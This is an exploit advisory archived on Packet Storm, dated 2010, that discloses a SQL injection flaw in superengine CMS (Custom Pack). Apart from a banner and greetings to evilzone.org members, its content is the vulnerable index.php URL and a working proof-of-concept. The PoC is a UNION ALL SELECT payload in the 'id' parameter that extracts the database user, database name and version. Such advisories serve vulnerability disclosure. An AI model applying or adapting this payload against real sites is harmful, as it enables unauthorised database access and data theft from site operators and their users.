Superengine CMS SQL Injection

2010-02-15T00:00:00
ID PACKETSTORM:86314
Type packetstorm
Reporter 10n1z3d
Modified 2010-02-15T00:00:00

Description

                                        
                                            `  
.__.__   
_______ _|__| | ____________ ____ ____   
_/ __ \ \/ / | | \___ / _ \ / \_/ __ \   
\ ___/\ /| | |__/ ( <_> ) | \ ___/   
\___ >\_/ |__|____/_____ \____/|___| /\___ >  
\/ \/ \/ \/ .org  
  
Author: 10n1z3d <10n1z3d[at]w[dot]cn>   
Date: 15/02/2010  
  
---------------------------------------------------------  
superengine CMS (Custom Pack) SQL Injection Vulnerability  
---------------------------------------------------------  
  
  
Vendor: http://superengine.ro/  
  
Vuln:  
http://[server]/index.php?mod=0&id=1[SQLI]  
  
PoC:  
http://[server]/index.php?mod=0&id=-1337+UNION+ALL+SELECT+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6--  
  
  
---------------------------------------------------------  
Greetz to all evilzone.org members.  
`